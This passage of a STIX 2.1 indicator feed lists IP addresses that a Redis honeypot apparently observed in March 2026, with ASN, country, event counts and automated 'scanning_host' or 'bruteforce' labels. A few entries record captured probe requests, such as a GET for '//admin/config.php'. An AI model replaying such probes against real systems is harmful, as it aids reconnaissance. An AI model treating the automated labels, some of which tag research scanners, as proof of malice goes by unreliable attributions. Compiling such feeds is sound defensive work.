      "name": "OTX pulse_name=Redishoneypot \u2192 Attacker IPs \u2013 Australia \u2013 March 2026",
      "pattern": "[ipv4-addr:value = '205.210.31.85']",
      "pattern_type": "stix",
      "pattern_version": "2.1",
      "spec_version": "2.1",
      "type": "indicator",
      "valid_from": "2026-03-09T04:25:06.000Z",
      "valid_until": "2026-04-10T04:25:05.000Z"
    },
    {
      "created": "2026-03-09T04:25:06.000Z",
      "description": "Attacker IP \u2022 Redis / seen in Redishoneypot; events=5; ports=6379; cc=US; asn=14618; asn_org=Amazon.com, Inc.; redis_cmd_hits=0",
      "id": "indicator--8e04a428-3918-4c1e-8453-cb0474904c20",
      "labels": [
        "scanning_host"
      ],
      "modified": "2026-03-09T04:25:06.000Z",
      "name": "OTX pulse_name=Redishoneypot \u2192 Attacker IPs \u2013 Australia \u2013 March 2026",
      "pattern": "[ipv4-addr:value = '3.239.13.6']",
      "pattern_type": "stix",
      "pattern_version": "2.1",
      "spec_version": "2.1",
      "type": "indicator",
      "valid_from": "2026-03-09T04:25:06.000Z",
      "valid_until": "2026-04-10T04:25:05.000Z"
    },
    {
      "created": "2026-03-09T05:25:14.000Z",
      "description": "Attacker IP \u2022 Redis / seen in Redishoneypot; events=4; ports=6379; cc=US; asn=14061; asn_org=DigitalOcean, LLC; redis_cmd_hits=0",
      "id": "indicator--19294839-46ae-4362-a12e-44277ec9470d",
      "labels": [
        "scanning_host"
      ],
      "modified": "2026-03-09T05:25:14.000Z",
      "name": "OTX pulse_name=Redishoneypot \u2192 Attacker IPs \u2013 Australia \u2013 March 2026",
      "pattern": "[ipv4-addr:value = '192.241.150.153']",
      "pattern_type": "stix",
      "pattern_version": "2.1",
      "spec_version": "2.1",
      "type": "indicator",
      "valid_from": "2026-03-09T05:25:14.000Z",
      "valid_until": "2026-04-10T05:25:13.000Z"
    },
    {
      "created": "2026-03-09T06:25:13.000Z",
      "description": "Attacker IP \u2022 Redis / seen in Redishoneypot; events=5; ports=6379; cc=CN; asn=45090; asn_org=Shenzhen Tencent Computer Systems Company Limited; redis_cmd_hits=0",
      "id": "indicator--8f155738-3760-40b0-9dd4-82781b3b084e",
      "labels": [
        "scanning_host"
      ],
      "modified": "2026-03-09T06:25:13.000Z",
      "name": "OTX pulse_name=Redishoneypot \u2192 Attacker IPs \u2013 Australia \u2013 March 2026",
      "pattern": "[ipv4-addr:value = '106.55.63.187']",
      "pattern_type": "stix",
      "pattern_version": "2.1",
      "spec_version": "2.1",
      "type": "indicator",
      "valid_from": "2026-03-09T06:25:13.000Z",
      "valid_until": "2026-04-10T06:25:12.000Z"
    },
    {
      "created": "2026-03-09T07:25:15.000Z",
      "description": "Attacker IP \u2022 Redis / seen in Redishoneypot; events=17; ports=6379; cc=US; asn=14061; asn_org=DigitalOcean, LLC; cats=Detection of a Network Scan,Generic Protocol Command Decode; redis_cmds=GET / HTTP/1.1; redis_cmd_hits=0",
      "id": "indicator--a544a7b2-ee0b-4afa-b9b0-23a08673a089",
      "labels": [
        "bruteforce"
      ],
      "modified": "2026-03-09T07:25:15.000Z",
      "name": "OTX pulse_name=Redishoneypot \u2192 Attacker IPs \u2013 Australia \u2013 March 2026",
      "pattern": "[ipv4-addr:value = '142.93.4.137']",
      "pattern_type": "stix",
      "pattern_version": "2.1",
      "spec_version": "2.1",
      "type": "indicator",
      "valid_from": "2026-03-09T07:25:15.000Z",
      "valid_until": "2026-04-10T07:25:12.000Z"
    },
    {
      "created": "2026-03-09T07:25:15.000Z",
      "description": "Attacker IP \u2022 Redis / seen in Redishoneypot; events=5; ports=6379; cc=FR; asn=43350; asn_org=NForce Entertainment B.V.; redis_cmd_hits=0",
      "id": "indicator--5ee36acd-4492-4b81-af8f-a7b19bbef225",
      "labels": [
        "scanning_host"
      ],
      "modified": "2026-03-09T07:25:15.000Z",
      "name": "OTX pulse_name=Redishoneypot \u2192 Attacker IPs \u2013 Australia \u2013 March 2026",
      "pattern": "[ipv4-addr:value = '185.107.80.93']",
      "pattern_type": "stix",
      "pattern_version": "2.1",
      "spec_version": "2.1",
      "type": "indicator",
      "valid_from": "2026-03-09T07:25:15.000Z",
      "valid_until": "2026-04-10T07:25:12.000Z"
    },
    {
      "created": "2026-03-09T08:25:13.000Z",
      "description": "Attacker IP \u2022 Redis / seen in Redishoneypot; events=90; ports=6379; cc=US; asn=49870; asn_org=Alsycon B.V.; cats=Generic Protocol Command Decode; redis_cmds=GET //admin/config.php HTTP/1.1,GET / HTTP/1.1; redis_cmd_hits=0",
      "id": "indicator--f465b2cd-8f22-46f2-869a-ff125a4cc6c8",
      "labels": [
        "bruteforce"
      ],
      "modified": "2026-03-09T08:25:13.000Z",
      "name": "OTX pulse_name=Redishoneypot \u2192 Attacker IPs \u2013 Australia \u2013 March 2026",
      "pattern": "[ipv4-addr:value = '77.83.240.70']",
      "pattern_type": "stix",
      "pattern_version": "2.1",
      "spec_version": "2.1",
      "type": "indicator",
      "valid_from": "2026-03-09T08:25:13.000Z",
      "valid_until": "2026-04-10T08:25:12.000Z"
    },
    {
      "created": "2026-03-09T08:25:13.000Z",
      "description": "Attacker IP \u2022 Redis / seen in Redishoneypot; events=6; ports=6379; cc=UZ; asn=43647; asn_org=Servercore Cis LLC; redis_cmd_hits=0",
      "id": "indicator--c73aea9c-c112-42e7-b547-b4603a447637",
      "labels": [
        "scanning_host"
      ],
      "modified": "2026-03-09T08:25:13.000Z",
      "name": "OTX pulse_name=Redishoneypot \u2192 Attacker IPs \u2013 Australia \u2013 March 2026",
      "pattern": "[ipv4-addr:value = '94.154.129.109']",
      "pattern_type": "stix",
      "pattern_version": "2.1",
      "spec_version": "2.1",
      "type": "indicator",
      "valid_from": "2026-03-09T08:25:13.000Z",
      "valid_until": "2026-04-10T08:25:12.000Z"
    },
    {
      "created": "2026-03-09T09:25:10.000Z",
      "description": "Attacker IP \u2022 Redis / seen in Redishoneypot; events=23; ports=6379; cc=US; asn=8075; asn_org=Microsoft Corporation; redis_cmd_hits=0",
      "id": "indicator--8e8cb263-8809-4b38-88ea-f2d8868b6d02",
      "labels": [
        "bruteforce"
      ],
      "modified": "2026-03-09T09:25:10.000Z",
      "name": "OTX pulse_name=Redishoneypot \u2192 Attacker IPs \u2013 Australia \u2013 March 2026",
      "pattern": "[ipv4-addr:value = '172.202.118.18']",
      "pattern_type": "stix",
      "pattern_version": "2.1",
      "spec_version": "2.1",
      "type": "indicator",
      "valid_from": "2026-03-09T09:25:10.000Z",
      "valid_until": "2026-04-10T09:25:09.000Z"
    },
    {
      "created": "2026-03-09T10:25:13.000Z",
      "description": "Attacker IP \u2022 Redis / seen in Redishoneypot; events=4; ports=6379; cc=SC; asn=135377; asn_org=UCLOUD INFORMATION TECHNOLOGY HK LIMITED; redis_cmd_hits=0",
      "id": "indicator--f535580a-27f8-4929-9afe-85beec02ec7d",
      "labels": [
        "scanning_host"
      ],
      "modified": "2026-03-09T10:25:13.000Z",
      "name": "OTX pulse_name=Redishoneypot \u2192 Attacker IPs \u2013 Australia \u2013 March 2026",
      "pattern": "[ipv4-addr:value = '154.83.197.143']",
      "pattern_type": "stix",
      "pattern_version": "2.1",
      "spec_version": "2.1",
      "type": "indicator",
      "valid_from": "2026-03-09T10:25:13.000Z",
      "valid_until": "2026-04-10T10:25:12.000Z"
    },
    {
      "created": "2026-03-09T11:25:07.000Z",
      "description": "Attacker IP \u2022 Redis / seen in Redishoneypot; events=13; ports=6379; cc=US; asn=213412; asn_org=ONYPHE SAS; cats=Generic Protocol Command Decode; redis_cmd_hits=0",
      "id": "indicator--86e892f1-3380-40f2-baa3-70d7cb83a292",
      "labels": [
        "bruteforce"
      ],
      "modified": "2026-03-09T11:25:07.000Z",
      "name": "OTX pulse_name=Redishoneypot \u2192 Attacker IPs \u2013 Australia \u2013 March 2026",
      "pattern": "[ipv4-addr:value = '91.230.168.142']",
      "pattern_type": "stix",
      "pattern_version": "2.1",
      "spec_version": "2.1",
      "type": "indicator",
      "valid_from": "2026-03-09T11:25:07.000Z",
      "valid_until": "2026-04-10T11:25:05.000Z"
    },
    {
      "created": "2026-03-09T11:25:07.000Z",
      "description": "Attacker IP \u2022 Redis / seen in Redishoneypot; events=12; ports=6379; cc=US; asn=213412; asn_org=ONYPHE SAS; cats=Generic Protocol Command Decode; redis_cmds=GET / HTTP/1.1; redis_cmd_hits=0",
      "id": "indicator--02ddc4c4-3302-457f-ad6f-f0b1853aeecc",
      "labels": [
        "bruteforce"
      ],
      "modified": "2026-03-09T11:25:07.000Z",
      "name": "OTX pulse_name=Redishoneypot \u2192 Attacker IPs \u2013 Australia \u2013 March 2026",
      "pattern": "[ipv4-addr:value = '91.230.168.184']",
      "pattern_type": "stix",
      "pattern_version": "2.1",
      "spec_version": "2.1",
      "type": "indicator",
      "valid_from": "2026-03-09T11:25:07.000Z",
      "valid_until": "2026-04-10T11:25:05.000Z"
    },
    {
      "created": "2026-03-09T12:25:12.000Z",
      "description": "Attacker IP \u2022 Redis / seen in Redishoneypot; events=4; ports=6379; cc=US; asn=6939; asn_org=Hurricane Electric LLC; redis_cmd_hits=0",
      "id": "indicator--f34d51e1-b528-40dd-9892-127eaf3d1b78",
      "labels": [
        "scanning_host"
      ],
      "modified": "2026-03-09T12:25:12.000Z",
      "name": "OTX pulse_name=Redishoneypot \u2192 Attacker IPs \u2013 Australia \u2013 March 2026",
      "pattern": "[ipv4-addr:value = '64.62.197.118']",
      "pattern_type": "stix",
      "pattern_version": "2.1",
      "spec_version": "2.1",
      "type": "indicator",
      "valid_from": "2026-03-09T12:25:12.000Z",
      "valid_until": "2026-04-10T12:25:09.000Z"
    },
    {
      "created": "2026-03-09T13:25:13.000Z",
      "description": "Attacker IP \u2022 Redis / seen in Redishoneypot; events=5; ports=6379; cc=US; asn=63949; asn_org=Akamai Connected Cloud; redis_cmd_hits=0",
      "id": "indicator--feb69c43-abe1-422e-b806-4d45682cc6e2",
      "labels": [
        "scanning_host"
      ],
      "modified": "2026-03-09T13:25:13.000Z",
      "name": "OTX pulse_name=Redishoneypot \u2192 Attacker IPs \u2013 Australia \u2013 March 2026",
      "pattern": "[ipv4-addr:value = '173.255.210.89']",
      "pattern_type": "stix",
      "pattern_version": "2.1",
      "spec_version": "2.1",
      "type": "indicator",
      "valid_from": "2026-03-09T13:25:13.000Z",
      "valid_until": "2026-04-10T13:25:12.000Z"
    },
    {
      "created": "2026-03-09T17:25:13.000Z",
      "description": "Attacker IP \u2022 Redis / seen in Redishoneypot; events=1; ports=6379; cc=AU; asn=63949; asn_org=Akamai Connected Cloud; cats=Generic Protocol Command Decode; redis_cmd_hits=0",
      "id": "indicator--afbb2818-1215-4df4-bc60-2174992cc157",
      "labels": [
        "scanning_host"
      ],
      "modified": "2026-03-09T17:25:13.000Z",
      "name": "OTX pulse_name=Redishoneypot \u2192 Attacker IPs \u2013 Australia \u2013 March 2026",
      "pattern": "[ipv4-addr:value = '172.105.186.117']",
      "pattern_type": "stix",
      "pattern_version": "2.1",
      "spec_version": "2.1",
      "type": "indicator",
      "valid_from": "2026-03-09T17:25:13.000Z",
      "valid_until": "2026-04-10T17:25:12.000Z"
    },
    {
      "created": "2026-03-09T17:25:13.000Z",
      "description": "Attacker IP \u2022 Redis / seen in Redishoneypot; events=6; ports=6379; cc=LT; asn=16125; asn_org=UAB Cherry Servers; redis_cmd_hits=0",
      "id": "indicator--d8199bd6-a6b0-426b-a22c-4608a411abe7",
      "labels": [
        "scanning_host"
      ],
      "modified": "2026-03-09T17:25:13.000Z",
      "name": "OTX pulse_name=Redishoneypot \u2192 Attacker IPs \u2013 Australia \u2013 March 2026",
      "pattern": "[ipv4-addr:value = '188.214.133.176']",
      "pattern_type": "stix",
      "pattern_version": "2.1",
      "spec_version": "2.1",
      "type": "indicator",
      "valid_from": "2026-03-09T17:25:13.000Z",
      "valid_until": "2026-04-10T17:25:12.000Z"
    },
    {
      "created": "2026-03-09T18:25:13.000Z",
      "description": "Attacker IP \u2022 Redis / seen in Redishoneypot; events=5; ports=6379; cc=CN; asn=38365; asn_org=Beijing Baidu Netcom Science and Technology Co., Ltd.; redis_cmd_hits=0",
      "id": "indicator--fd4cfe9b-30d5-414d-8904-0ff494ec4118",
      "labels": [
        "scanning_host"
      ],
      "modified": "2026-03-09T18:25:13.000Z",
      "name": "OTX pulse_name=Redishoneypot \u2192 Attacker IPs \u2013 Australia \u2013 March 2026",
      "pattern": "[ipv4-addr:value = '120.48.43.118']",
      "pattern_type": "stix",
      "pattern_version": "2.1",
      "spec_version": "2.1",
      "type": "indicator",
      "valid_from": "2026-03-09T18:25:13.000Z",
      "valid_until": "2026-04-10T18:25:12.000Z"
    },
    {
      "created": "2026-03-09T18:25:13.000Z",
      "description": "Attacker IP \u2022 Redis / seen in Redishoneypot; events=9; ports=6379; cc=ID; asn=17451; asn_org=BIZNET NETWORKS; redis_cmd_hits=0",
      "id": "indicator--12d1c3e8-db8e-41c6-93bc-11a76dfddc10",
      "labels": [
        "bruteforce"
      ],
      "modified": "2026-03-09T18:25:13.000Z",
      "name": "OTX pulse_name=Redishoneypot \u2192 Attacker IPs \u2013 Australia \u2013 March 2026",
      "pattern": "[ipv4-addr:value = '182.253.116.35']",
      "pattern_type": "stix",
      "pattern_version": "2.1",
      "spec_version": "2.1",
      "type": "indicator",
      "valid_from": "2026-03-09T18:25:13.000Z",
      "valid_until": "2026-04-10T18:25:12.000Z"
    },
    {
      "created": "2026-03-09T18:25:13.000Z",
      "description": "Attacker IP \u2022 Redis / seen in Redishoneypot; events=13; ports=6379; cc=NL; asn=202425; asn_org=IP Volume inc; cats=Generic Protocol Command Decode; redis_cmd_hits=0",
      "id": "indicator--41eff508-cf9f-46cb-9dc7-999c952d0089",
      "labels": [
        "bruteforce"
      ],
      "modified": "2026-03-09T18:25:13.000Z",
      "name": "OTX pulse_name=Redishoneypot \u2192 Attacker IPs \u2013 Australia \u2013 March 2026",
      "pattern": "[ipv4-addr:value = '80.82.70.133']",
      "pattern_type": "stix",
      "pattern_version": "2.1",
      "spec_version": "2.1",
      "type": "indicator",
      "valid_from": "2026-03-09T18:25:13.000Z",
      "valid_until": "2026-04-10T18:25:12.000Z"
    },
    {
      "created": "2026-03-09T18:25:13.000Z",
      "description": "Attacker IP \u2022 Redis / seen in Redishoneypot; events=18; ports=6379; cc=NL; asn=202425; asn_org=IP Volume inc; redis_cmd_hits=0",
      "id": "indicator--95e132dc-a777-46da-bfb1-662341a5408b",
      "labels": [
        "bruteforce"
      ],
      "modified": "2026-03-09T18:25:13.000Z",
      "name": "OTX pulse_name=Redishoneypot \u2192 Attacker IPs \u2013 Australia \u2013 March 2026",
      "pattern": "[ipv4-addr:value = '94.102.49.155']",
      "pattern_type": "stix",
      "pattern_version": "2.1",
      "spec_version": "2.1",
      "type": "indicator",
      "valid_from": "2026-03-09T18:25:13.000Z",
      "valid_until": "2026-04-10T18:25:12.000Z"
    },
    {
      "created": "2026-03-09T20:25:13.000Z",
      "description": "Attacker IP \u2022 Redis / seen in Redishoneypot; events=10; ports=6379; cc=CN; asn=4134; asn_org=Chinanet; redis_cmd_hits=0",
      "id": "indicator--2239211a-7507-478f-8d8a-a01b68fa042e",
      "labels": [
        "bruteforce"
      ],
      "modified": "2026-03-09T20:25:13.000Z",
      "name": "OTX pulse_name=Redishoneypot \u2192 Attacker IPs \u2013 Australia \u2013 March 2026",
      "pattern": "[ipv4-addr:value = '123.245.85.127']",
      "pattern_type": "stix",
      "pattern_version": "2.1",
      "spec_version": "2.1",
      "type": "indicator",
      "valid_from": "2026-03-09T20:25:13.000Z",
      "valid_until": "2026-04-10T20:25:12.000Z"
    },
    {
      "created": "2026-03-09T20:25:13.000Z",
      "description": "Attacker IP \u2022 Redis / seen in Redishoneypot; events=5; ports=6379; cc=CN; asn=4837; asn_org=CHINA UNICOM China169 Backbone; redis_cmd_hits=0",
      "id": "indicator--53671e33-00af-46b9-81c5-01a3149e20a2",
      "labels": [
        "scanning_host"
      ],
      "modified": "2026-03-09T20:25:13.000Z",
      "name": "OTX pulse_name=Redishoneypot \u2192 Attacker IPs \u2013 Australia \u2013 March 2026",
      "pattern": "[ipv4-addr:value = '124.133.212.41']",
      "pattern_type": "stix",
      "pattern_version": "2.1",
      "spec_version": "2.1",
      "type": "indicator",
      "valid_from": "2026-03-09T20:25:13.000Z",
      "valid_until": "2026-04-10T20:25:12.000Z"
    },
    {
      "created": "2026-03-09T20:25:13.000Z",
      "description": "Attacker IP \u2022 Redis / seen in Redishoneypot; events=12; ports=6379; cc=US; asn=398324; asn_org=Censys, Inc.; redis_cmd_hits=0",
      "id": "indicator--99709ffd-100d-45e3-becb-170aef59b4eb",
      "labels": [
        "bruteforce"
      ],
      "modified": "2026-03-09T20:25:13.000Z",
      "name": "OTX pulse_name=Redishoneypot \u2192 Attacker IPs \u2013 Australia \u2013 March 2026",
      "pattern": "[ipv4-addr:value = '162.142.125.127']",
      "pattern_type": "stix",
      "pattern_version": "2.1",
      "spec_version": "2.1",
      "type": "indicator",
      "valid_from": "2026-03-09T20:25:13.000Z",
      "valid_until": "2026-04-10T20:25:12.000Z"
    },
    {
      "created": "2026-03-09T21:25:02.000Z",
      "description": "Attacker IP \u2022 Redis / seen in Redishoneypot; events=5; ports=6379; cc=CN; asn=45090; asn_org=Shenzhen Tencent Computer Systems Company Limited; redis_cmd_hits=0",
      "id": "indicator--9013458c-43e2-4e43-b785-56d2893c6358",
      "labels": [
        "scanning_host"
      ],
      "modified": "2026-03-09T21:25:02.000Z",
      "name": "OTX pulse_name=Redishoneypot \u2192 Attacker IPs \u2013 Australia \u2013 March 2026",
      "pattern": "[ipv4-addr:value = '175.178.24.123']",
      "pattern_type": "stix",
      "pattern_version": "2.1",
      "spec_version": "2.1",
      "type": "indicator",
      "valid_from": "2026-03-09T21:25:02.000Z",
      "valid_until": "2026-04-10T21:25:01.000Z"
    },
    {
      "created": "2026-03-10T00:25:06.000Z",
      "description": "Attacker IP \u2022 Redis / seen in Redishoneypot; events=5; ports=6379; cc=CN; asn=140527; asn_org=China Telecom; redis_cmd_hits=0",
      "id": "indicator--ff346367-43fd-43b0-8ffc-8a9670db50d2",
      "labels": [
        "scanning_host"
      ],
      "modified": "2026-03-10T00:25:06.000Z",
      "name": "OTX pulse_name=Redishoneypot \u2192 Attacker IPs \u2013 Australia \u2013 March 2026",
      "pattern": "[ipv4-addr:value = '117.68.86.5']",
      "pattern_type": "stix",
      "pattern_version": "2.1",
      "spec_version": "2.1",
      "type": "indicator",
      "valid_from": "2026-03-10T00:25:06.000Z",
      "valid_until": "2026-04-11T00:25:05.000Z"
    },
    {
      "created": "2026-03-10T00:25:06.000Z",
      "description": "Attacker IP \u2022 Redis / seen in Redishoneypot; events=26; ports=6379; cc=US; asn=6939; asn_org=Hurricane Electric LLC; redis_cmd_hits=0",
      "id": "indicator--dcbef8fd-c501-4465-865f-3c0640147821",
      "labels": [
        "bruteforce"
      ],
      "modified": "2026-03-10T00:25:06.000Z",
      "name": "OTX pulse_name=Redishoneypot \u2192 Attacker IPs \u2013 Australia \u2013 March 2026",
      "pattern": "[ipv4-addr:value = '65.49.1.52']",
      "pattern_type": "stix",
      "pattern_version": "2.1",
      "spec_version": "2.1",
      "type": "indicator",
      "valid_from": "2026-03-10T00:25:06.000Z",
      "valid_until": "2026-04-11T00:25:05.000Z"
    },
    {
      "created": "2026-03-10T00:25:06.000Z",
      "description": "Attacker IP \u2022 Redis / seen in Redishoneypot; events=4; ports=6379; cc=US; asn=6939; asn_org=Hurricane Electric LLC; redis_cmd_hits=0",
      "id": "indicator--222b789f-5221-42d7-aae6-f9bddf759b45",
      "labels": [
        "scanning_host"
      ],
      "modified": "2026-03-10T00:25:06.000Z",
      "name": "OTX pulse_name=Redishoneypot \u2192 Attacker IPs \u2013 Australia \u2013 March 2026",
      "pattern": "[ipv4-addr:value = '65.49.1.55']",
      "pattern_type": "stix",
      "pattern_version": "2.1",
      "spec_version": "2.1",
      "type": "indicator",
      "valid_from": "2026-03-10T00:25:06.000Z",
      "valid_until": "2026-04-11T00:25:05.000Z"
    },
    {
      "created": "2026-03-10T03:25:13.000Z",
      "description": "Attacker IP \u2022 Redis / seen in Redishoneypot; events=5; ports=6379; cc=LY; asn=329263; asn_org=Libyan-Spider-for-IT-LTD; redis_cmd_hits=0",
      "id": "indicator--6405c67e-e6e3-49fa-9815-7bd2b4d9196b",
      "labels": [
        "scanning_host"
      ],
      "modified": "2026-03-10T03:25:13.000Z",
      "name": "OTX pulse_name=Redishoneypot \u2192 Attacker IPs \u2013 Australia \u2013 March 2026",
      "pattern": "[ipv4-addr:value = '102.203.200.156']",
      "pattern_type": "stix",
      "pattern_version": "2.1",
      "spec_version": "2.1",
      "type": "indicator",
      "valid_from": "2026-03-10T03:25:13.000Z",
      "valid_until": "2026-04-11T03:25:12.000Z"
    },
    {
      "created": "2026-03-10T03:25:13.000Z",
      "description": "Attacker IP \u2022 Redis / seen in Redishoneypot; events=21; ports=6379; cc=US; asn=14061; asn_org=DigitalOcean, LLC; redis_cmd_hits=0",
      "id": "indicator--a5f692e9-7e12-4bbb-bdcb-ee2d3de65af7",
      "labels": [
        "bruteforce"
      ],
      "modified": "2026-03-10T03:25:13.000Z",
      "name": "OTX pulse_name=Redishoneypot \u2192 Attacker IPs \u2013 Australia \u2013 March 2026",
      "pattern": "[ipv4-addr:value = '67.205.172.104']",
      "pattern_type": "stix",
      "pattern_version": "2.1",
      "spec_version": "2.1",
      "type": "indicator",
      "valid_from": "2026-03-10T03:25:13.000Z",
      "valid_until": "2026-04-11T03:25:12.000Z"
    },
    {
      "created": "2026-03-10T05:25:11.000Z",
      "description": "Attacker IP \u2022 Redis / seen in Redishoneypot; events=10; ports=6379; cc=IN; asn=132445; asn_org=Khetan Cable Network Pvt. Limited; redis_cmd_hits=0",
      "id": "indicator--cecff700-cfbc-450a-a42c-753e508f1969",
      "labels": [
        "bruteforce"
      ],
      "modified": "2026-03-10T05:25:11.000Z",
      "name": "OTX pulse_name=Redishoneypot \u2192 Attacker IPs \u2013 Australia \u2013 March 2026",
      "pattern": "[ipv4-addr:value = '103.21.55.238']",
      "pattern_type": "stix",
      "pattern_version": "2.1",
      "spec_version": "2.1",
      "type": "indicator",
      "valid_from": "2026-03-10T05:25:11.000Z",
      "valid_until": "2026-04-11T05:25:10.000Z"
    },
    {
      "created": "2026-03-10T08:25:02.000Z",
      "description": "Attacker IP \u2022 Redis / seen in Redishoneypot; events=15; ports=6379; cc=US; asn=8075; asn_org=Microsoft Corporation; redis_cmd_hits=0",
      "id": "indicator--5e183ff9-f150-4c91-b712-ab23ece16752",
      "labels": [
        "bruteforce"
      ],
      "modified": "2026-03-10T08:25:02.000Z",
      "name": "OTX pulse_name=Redishoneypot \u2192 Attacker IPs \u2013 Australia \u2013 March 2026",
      "pattern": "[ipv4-addr:value = '20.29.47.111']",
      "pattern_type": "stix",
      "pattern_version": "2.1",
      "spec_version": "2.1",
      "type": "indicator",
      "valid_from": "2026-03-10T08:25:02.000Z",
      "valid_until": "2026-04-11T08:25:01.000Z"
    },
    {
      "created": "2026-03-10T08:25:02.000Z",
      "description": "Attacker IP \u2022 Redis / seen in Redishoneypot; events=17; ports=6379; cc=CA; asn=12989; asn_org=Black HOST Ltd; redis_cmd_hits=0",
      "id": "indicator--c8d7f83e-5f8d-42ba-99ed-cdb3b5ded5c8",
      "labels": [
        "bruteforce"
      ],
      "modified": "2026-03-10T08:25:02.000Z",
      "name": "OTX pulse_name=Redishoneypot \u2192 Attacker IPs \u2013 Australia \u2013 March 2026",
      "pattern": "[ipv4-addr:value = '86.54.31.34']",
      "pattern_type": "stix",
      "pattern_version": "2.1",
      "spec_version": "2.1",
      "type": "indicator",
      "valid_from": "2026-03-10T08:25:02.000Z",
      "valid_until": "2026-04-11T08:25:01.000Z"
    },
    {
      "created": "2026-03-10T09:25:02.000Z",
      "description": "Attacker IP \u2022 Redis / seen in Redishoneypot; events=30; ports=6379; cc=US; asn=202412; asn_org=Omegatech LTD; cats=Generic Protocol Command Decode; redis_cmds=GET /welcome HTTP/1.1; redis_cmd_hits=0",
      "id": "indicator--a77c1360-0aef-4a92-a9a9-b1d494c9aa29",
      "labels": [
        "bruteforce"
      ],
      "modified": "2026-03-10T09:25:02.000Z",
      "name": "OTX pulse_name=Redishoneypot \u2192 Attacker IPs \u2013 Australia \u2013 March 2026",
      "pattern": "[ipv4-addr:value = '130.12.180.150']",
      "pattern_type": "stix",
      "pattern_version": "2.1",
      "spec_version": "2.1",
      "type": "indicator",
      "valid_from": "2026-03-10T09:25:02.000Z",
      "valid_until": "2026-04-11T09:25:01.000Z"
    },
    {
      "created": "2026-03-10T09:25:02.000Z",
      "description": "Attacker IP \u2022 Redis / seen in Redishoneypot; events=11; ports=6379; cc=RU; asn=198953; asn_org=Proton66 OOO; redis_cmd_hits=0",
      "id": "indicator--2c3cea6d-6503-4ff1-85ff-488686df59e9",
      "labels": [
        "bruteforce"
      ],
      "modified": "2026-03-10T09:25:02.000Z",
      "name": "OTX pulse_name=Redishoneypot \u2192 Attacker IPs \u2013 Australia \u2013 March 2026",
      "pattern": "[ipv4-addr:value = '193.143.1.23']",
      "pattern_type": "stix",
      "pattern_version": "2.1",
      "spec_version": "2.1",
      "type": "indicator",
      "valid_from": "2026-03-10T09:25:02.000Z",
      "valid_until": "2026-04-11T09:25:01.000Z"
    },
    {
      "created": "2026-03-10T11:25:03.000Z",
      "description": "Attacker IP \u2022 Redis / seen in Redishoneypot; events=5; ports=6379; cc=CN; asn=45090; asn_org=Shenzhen Tencent Computer Systems Company Limited; redis_cmd_hits=0",
      "id": "indicator--6cd88b5e-3a84-4d7b-9c9b-cbe312f43ac8",
      "labels": [
        "scanning_host"
      ],
      "modified": "2026-03-10T11:25:03.000Z",
      "name": "OTX pulse_name=Redishoneypot \u2192 Attacker IPs \u2013 Australia \u2013 March 2026",
      "pattern": "[ipv4-addr:value = '101.35.251.162']",
      "pattern_type": "stix",
      "pattern_version": "2.1",
      "spec_version": "2.1",
      "type": "indicator",
      "valid_from": "2026-03-10T11:25:03.000Z",
      "valid_until": "2026-04-11T11:25:02.000Z"
    },
    {
      "created": "2026-03-10T11:25:03.000Z",
      "description": "Attacker IP \u2022 Redis / seen in Redishoneypot; events=9; ports=6379; cc=US; asn=16509; asn_org=Amazon.com, Inc.; cats=Misc activity; redis_cmd_hits=0",
      "id": "indicator--f5031ef2-314f-4caf-ad26-021337519975",
      "labels": [
        "bruteforce"
      ],
      "modified": "2026-03-10T11:25:03.000Z",
      "name": "OTX pulse_name=Redishoneypot \u2192 Attacker IPs \u2013 Australia \u2013 March 2026",
      "pattern": "[ipv4-addr:value = '13.58.203.73']",
      "pattern_type": "stix",
      "pattern_version": "2.1",
      "spec_version": "2.1",
      "type": "indicator",
      "valid_from": "2026-03-10T11:25:03.000Z",
      "valid_until": "2026-04-11T11:25:02.000Z"
    },
    {
      "created": "2026-03-10T11:25:03.000Z",
      "description": "Attacker IP \u2022 Redis / seen in Redishoneypot; events=4; ports=6379; cc=GB; asn=212238; asn_org=Datacamp Limited; redis_cmd_hits=0",
      "id": "indicator--11abe87f-c477-4712-a4be-d553ead45ef6",
      "labels": [
        "scanning_host"
      ],
      "modified": "2026-03-10T11:25:03.000Z",
      "name": "OTX pulse_name=Redishoneypot \u2192 Attacker IPs \u2013 Australia \u2013 March 2026",
      "pattern": "[ipv4-addr:value = '178.83.200.3']",
      "pattern_type": "stix",
      "pattern_version": "2.1",
      "spec_version": "2.1",
      "type": "indicator",
      "valid_from": "2026-03-10T11:25:03.000Z",
      "valid_until": "2026-04-11T11:25:02.000Z"
    },
    {
      "created": "2026-03-10T14:25:14.000Z",
      "description": "Attacker IP \u2022 Redis / seen in Redishoneypot; events=15; ports=6379; cc=US; asn=8075; asn_org=Microsoft Corporation; redis_cmd_hits=0",
      "id": "indicator--98337031-14c1-4462-b635-f1bfd65869ce",
      "labels": [
        "bruteforce"
      ],
      "modified": "2026-03-10T14:25:14.000Z",
      "name": "OTX pulse_name=Redishoneypot \u2192 Attacker IPs \u2013 Australia \u2013 March 2026",
      "pattern": "[ipv4-addr:value = '135.237.126.37']",
      "pattern_type": "stix",
      "pattern_version": "2.1",
      "spec_version": "2.1",
      "type": "indicator",
      "valid_from": "2026-03-10T14:25:14.000Z",
      "valid_until": "2026-04-11T14:25:12.000Z"
    },
    {
      "created": "2026-03-10T15:25:09.000Z",
      "description": "Attacker IP \u2022 Redis / seen in Redishoneypot; events=9; ports=6379; cc=CN; asn=9808; asn_org=China Mobile Communications Group Co., Ltd.; redis_cmd_hits=0",
      "id": "indicator--980ed310-bda1-4409-b2e5-f934b69c249d",
      "labels": [
        "bruteforce"
      ],
      "modified": "2026-03-10T15:25:09.000Z",
      "name": "OTX pulse_name=Redishoneypot \u2192 Attacker IPs \u2013 Australia \u2013 March 2026",
      "pattern": "[ipv4-addr:value = '36.170.62.63']",
      "pattern_type": "stix",
      "pattern_version": "2.1",
      "spec_version": "2.1",
      "type": "indicator",
      "valid_from": "2026-03-10T15:25:09.000Z",
      "valid_until": "2026-04-11T15:25:07.000Z"
    },
    {
      "created": "2026-03-10T15:25:09.000Z",
      "description": "Attacker IP \u2022 Redis / seen in Redishoneypot; events=5; ports=6379; cc=CN; asn=37963; asn_org=Hangzhou Alibaba Advertising Co.,Ltd.; redis_cmd_hits=0",
      "id": "indicator--9d6cf131-4740-4c60-9093-3bc535cece8f",
      "labels": [
        "scanning_host"
      ],
      "modified": "2026-03-10T15:25:09.000Z",
      "name": "OTX pulse_name=Redishoneypot \u2192 Attacker IPs \u2013 Australia \u2013 March 2026",
      "pattern": "[ipv4-addr:value = '47.94.213.192']",
      "pattern_type": "stix",
